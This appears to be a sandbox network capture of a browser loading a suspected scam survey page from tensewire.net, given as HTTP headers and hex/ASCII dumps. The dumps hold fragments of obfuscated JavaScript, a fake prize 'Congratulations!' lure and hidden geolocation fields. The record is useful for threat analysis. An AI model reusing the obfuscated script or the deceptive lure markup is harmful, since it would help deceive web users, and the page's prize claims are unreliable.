                              2024-04-25 18:22:11 UTC477INData Raw: 37 30 63 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 28 7b 7d 2c 22 22 2c 20 22 2f 33 61 33 36 65 66 32 39 35 39 65 38 37 62 32 63 61 32 37 63 38 66 30 34 62 37 32 36 61 33 34 33 22 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 65 62 61 28 5f 30 78 34 63 30 33 64 32 2c 5f 30 78 65 34 62 30 38 37 29 7b 63 6f 6e 73 74 20 5f 30 78 33 63 63 66 32 64 3d 5f 30 78 33 63 63 66 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 65 62 61 32 63 2c 5f 30 78 31 33 64 66 66 37 29 7b 5f 30 78 34 65 62 61 32 63 3d 5f 30 78 34 65 62 61 32 63 2d 30 78 31 34 66 3b 6c 65 74 20 5f 30 78 32 32 61 35 31 36 3d 5f 30 78 33 63 63 66 32 64 5b 5f 30 78 34 65 62 61 32 63 5d 3b 72 65 74
                              Data Ascii: 70c<script>window.history.pushState({},"", "/3a36ef2959e87b2ca27c8f04b726a343");function _0x4eba(_0x4c03d2,_0xe4b087){const _0x3ccf2d=_0x3ccf();return _0x4eba=function(_0x4eba2c,_0x13dff7){_0x4eba2c=_0x4eba2c-0x14f;let _0x22a516=_0x3ccf2d[_0x4eba2c];ret
                              2024-04-25 18:22:11 UTC1334INData Raw: 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 62 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 38 29 29 2f 30 78 34 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 39 29 29 2f 30 78 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 30 29 29 2f 30 78 36 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 36 32 29 29 2f 30 78 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 34 66 29 29 2f 30 78 38 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 36 30 29 29 2f 30 78 39 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 61 29 29 2f 30 78 61 2a
                              Data Ascii: arseInt(_0x61528b(0x15b))/0x3)+parseInt(_0x61528b(0x158))/0x4+parseInt(_0x61528b(0x159))/0x5*(-parseInt(_0x61528b(0x150))/0x6)+parseInt(_0x61528b(0x162))/0x7*(-parseInt(_0x61528b(0x14f))/0x8)+-parseInt(_0x61528b(0x160))/0x9+parseInt(_0x61528b(0x15a))/0xa*
                              2024-04-25 18:22:11 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.449742104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:11 UTC629OUTGET /3a36ef2959e87b2ca27c8f04b726a343?_ax=w HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:12 UTC820INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              pragma: no-cache
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rpzNfs44IVZFizZjnNPuklt2lRiGWs%2BwNTGlezsjipnEFL%2FPEEQn2Db8g5DppNTMSVf7aak1hzZ%2FJLRZQP%2BwZHxigA7lS8ecC86QmHtEM3TOTzM1fPner0FXzLKovuCK"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b6c8de553e8-ATL
                              2024-04-25 18:22:12 UTC549INData Raw: 32 32 66 38 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c
                              Data Ascii: 22f8<html lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow, noarchive"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1"> <
                              2024-04-25 18:22:12 UTC1369INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6e 73 65 77 69 72 65 2e 6e 65 74 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2e 35 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2e 35 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 2f 2d 2d 3e 0a 09 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22
                              Data Ascii: <link rel="stylesheet" href="https://tensewire.net/assets/vendors/bootstrap-4.5.3/css/bootstrap.min.css"></noscript> ...link rel="stylesheet" type="text/css" href="assets/vendors/bootstrap-4.5.3/css/bootstrap.min.css"/--> <link rel="preload" href="
                              2024-04-25 18:22:12 UTC1369INData Raw: 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 68 64 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 68 64 2d 74 6f 70 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 38 32 30 30 33 32 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 68 64 2d 74 6f 70 2d 74 78 20 7b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 66 72 6f 6e 74 2d 70 72 6f 67 72 65 73 73 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 38 32 30 30 33 32 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 70 72 6f 67 72 65 73 73 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 36 65 36 65 36
                              Data Ascii: mportant;} .hd {background-color: #ffffff !important;} .hd-top {background-color: #820032 !important;} .hd-top-tx {color: #ffffff !important;} .front-progress {background-color: #820032 !important;} .progress {background-color: #e6e6e6
                              2024-04-25 18:22:12 UTC1369INData Raw: 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0a 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 6d 2e 6a 73 3f 69 64 3d 27 2b 69 2b 64 6c 3b 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73
                              Data Ascii: ,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.ins
                              2024-04-25 18:22:12 UTC1369INData Raw: 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 20 6d 72 2d 31 20 63 61 72 74 2d 62 67 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a 09 09 20 20 4f 76 65 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 6e 5f 6f 66 66 65 27 3e 24 34 2c 30 30 30 2c 30 30 30 3c 2f 73 70 61 6e 3e 20 69 6e 20 4f 66 66 65 72 73 20 67 69 76 65 6e 20 6f 75 74 20 73 6f 20 66 61 72 21 09 20 20 3c 2f 64 69 76 3e 0a 09 20 20 09 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 72 71 75 65 65 53 74 79 6c 65 20 6d 72 2d 32 22 3e 0a 09 09 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 20 6d 72 2d 31 20 63 61 72 74 2d 62 67 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c
                              Data Ascii: lass="fa fa-shopping-cart mr-1 cart-bg" aria-hidden="true"></i> Over <span class='n_offe'>$4,000,000</span> in Offers given out so far! </div> <div class="marqueeStyle mr-2"> <i class="fa fa-shopping-cart mr-1 cart-bg" aria-hidden="true"><
                              2024-04-25 18:22:12 UTC1369INData Raw: 67 2d 75 73 2e 70 6e 67 22 20 61 6c 74 3d 22 46 6c 61 67 22 3e 09 09 09 20 20 3c 2f 73 70 61 6e 3e 0a 09 09 20 20 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 5a 69 70 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 33 30 33 30 31 22 3e 0a 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 43 6f 75 6e 74 72 79 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 55 53 22 3e 0a 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 43 69 74 79 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 41 74 6c 61 6e 74 61 22 3e 0a 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 53 74 61 74 65 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d
                              Data Ascii: g-us.png" alt="Flag"> </span> </div></div></div> <input id="ipZip" type="hidden" value="30301"> <input id="ipCountry" type="hidden" value="US"> <input id="ipCity" type="hidden" value="Atlanta"> <input id="ipState" type="hidden" value=
                              2024-04-25 18:22:12 UTC1369INData Raw: 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 66 6f 6f 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6e 74 69 6e 75 65 20 62 75 74 74 6f 6e 20 62 74 6e 2d 74 78 20 62 68 2d 63 6f 6c 6f 72 20 62 74 78 68 2d 63 6f 6c 6f 72 20 73 75 72 76 65 79 5f 62 75 74 74 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 6e 43 6c 69 63 6b 3d 22 73 74 61 72 74 53 75 72 76 65 79 55 28 31 32 30 29 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 22 3e 53 74 61 72 74 20 53 75 72 76 65 79 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20
                              Data Ascii: iv> </div> <div class="message-footer"> <button class="continue button btn-tx bh-color btxh-color survey_button" onClick="startSurveyU(120)" style="text-transform: uppercase;">Start Survey</button> </div>
                              2024-04-25 18:22:12 UTC197INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 71 75 65 73 74 69 6f 6e 42 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 61 6c 69 64 61 74 65 5f 73 20 68 69 64 64 65 6e 20 6c 6f 61 64 5f 62 6c 6f 63 6b 22 3e 0a 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 30 22 3e 0d 0a
                              Data Ascii: <div id="questionBody"> </div> </div> </div> </div> <div class="validate_s hidden load_block"><div style="padding: 20px; padding-bottom: 0">
                              2024-04-25 18:22:12 UTC1369INData Raw: 37 66 66 61 0d 0a 43 6f 6e 67 72 61 74 75 6c 61 74 69 6f 6e 73 21 09 09 09 3c 64 69 76 20 69 64 3d 22 70 65 72 63 65 6e 74 5f 73 22 3e 30 25 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 67 72 65 73 73 20 6d 74 2d 33 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 70 78 22 3e 0a 09 09 09 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 67 72 65 73 73 2d 62 61 72 20 70 62 5f 70 72 6f 63 65 73 73 20 66 72 6f 6e 74 2d 70 72 6f 67 72 65 73 73 22 20 72 6f 6c 65 3d 22 70 72 6f 67 72 65 73 73 62 61 72 22 20 61 72 69 61 2d 76 61 6c 75 65 6e 6f 77 3d 22 30 22 20 61 72 69 61 2d 76 61 6c 75 65 6d 69 6e 3d 22 30 22 20 61 72 69 61 2d 76 61 6c 75 65 6d 61 78 3d 22 31 30 30 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a
                              Data Ascii: 7ffaCongratulations!<div id="percent_s">0%</div><div class="progress mt-3" style="height: 10px"> <div class="progress-bar pb_process front-progress" role="progressbar" aria-valuenow="0" aria-valuemin="0" aria-valuemax="100"></div></div>
                              2024-04-25 18:22:12 UTC1369INData Raw: 74 2d 63 65 6e 74 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 63 61 72 6f 75 73 65 6c 50 72 6f 64 75 63 74 73 22 20 63 6c 61 73 73 3d 22 63 61 72 6f 75 73 65 6c 20 73 6c 69 64 65 20 72 6f 77 22 20 64 61 74 61 2d 72 69 64 65 3d 22 63 61 72 6f 75 73 65 6c 22 3e 0a 09 09 09 09 09 20 20 3c 6f 6c 20 63 6c 61 73 73 3d 22 63 61 72 6f 75 73 65 6c 2d 69 6e 64 69 63 61 74 6f 72 73 20 63 6f 6c 2d 73 6d 2d 32 20 63 6f 6c 2d 31 32 20 6f 72 64 65 72 2d 73 6d 2d 31 20 6f 72 64 65 72 2d 32 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 20 30 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 22 3e 0a 09 09 09 09 09 09 20 20 09 09 09 09 09 09 09 09 3c 6c 69 20 73 74 79 6c 65 3d 22 62 61 63 6b 67
                              Data Ascii: t-center"><div id="carouselProducts" class="carousel slide row" data-ride="carousel"> <ol class="carousel-indicators col-sm-2 col-12 order-sm-1 order-2" style="margin: 0; position: relative; display: block; "> <li style="backg


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.449743184.24.36.112443
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:11 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-04-25 18:22:12 UTC467INHTTP/1.1 200 OK
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              Content-Type: application/octet-stream
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              Server: ECAcc (chd/073D)
                              X-CID: 11
                              X-Ms-ApiVersion: Distribute 1.2
                              X-Ms-Region: prod-eus-z1
                              Cache-Control: public, max-age=132039
                              Date: Thu, 25 Apr 2024 18:22:12 GMT
                              Connection: close
                              X-CID: 2


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.449744104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:12 UTC666OUTGET /favicon.ico HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:12 UTC830INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:12 GMT
                              Content-Type: image/x-icon
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Thu, 25 Apr 2024 21:30:19 GMT
                              last-modified: Thu, 29 Sep 2022 23:17:43 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              CF-Cache-Status: HIT
                              Age: 593513
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9VYY5APUFZvwZ3HNBj5kF5YsPy9pPP1OMuI1QddKRjtm3wBaVJgXeOTU8240nDC3gq8fpCweITFfjN5ba9ZijDPjq3hAs7O2Sajxq3upjed%2FFr%2FLm3ZiA52xG7QGEC%2Bi"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b6eecfc8bb6-ATL
                              alt-svc: h3=":443"; ma=86400
                              2024-04-25 18:22:12 UTC539INData Raw: 33 63 32 65 0d 0a 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 0c 00 bc 00 13 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 20 00 be 00 d0 00 be 00
                              Data Ascii: 3c2e h6 (00 h&(
                              2024-04-25 18:22:12 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 be 00 95 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f8 00 be 00 66 00 be 00 2b 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f4 00 bd 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 39 00 be 00 e9 00 be 00 ff 00 bd 00 f8 00 bf 00 67 00 ff 00 01 00 00 00 00 00 c1 00 29 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f5 00 bd 00 59 00 00 00 01 00 00 00 00 00 00 00 00 00 bb 00 3c 00 be 00 cb 00 bd 00 65 00 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 00 29 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f4 00 bf 00 58 00 00 00 01 00 00 00 00 00 00 00 00 00 80 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 2a 00 bf 00 db 00 be 00 ff 00 be 00 ff 00 be
                              Data Ascii: f+Y9g)Y<e)X*
                              2024-04-25 18:22:12 UTC1369INData Raw: 00 be 00 ea 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 d5 00 be 00 47 00 ff 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 08 00 bd 00 6d 00 be 00 eb 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 d6 00 bd 00 46 00 ff 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 08 00 bf 00 6f 00 bf 00 ea 00 bf 00
                              Data Ascii: GmFo
                              2024-04-25 18:22:12 UTC1369INData Raw: bc 00 17 00 bd 00 aa 00 be 00 fc 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 e3 00 be 00 5a 00 cc 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 10 00 bc 00 86 00 be 00 f4 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 d7 00 be 00 47 00 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 22 00 bd 00 af 00 be 00 fb 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 e3 00 bf 00 5c 00 cc 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 10 00 bd 00 87 00 be 00 f3 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 d5 00 bd 00 46 00 aa 00 03 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii: ZG"\F
                              2024-04-25 18:22:12 UTC1369INData Raw: 00 00 00 00 00 00 00 c3 00 11 00 be 00 79 00 bd 00 c2 00 bd 00 92 00 bd 00 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 00 03 00 b6 00 07 00 bf 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii: y
                              2024-04-25 18:22:12 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii:
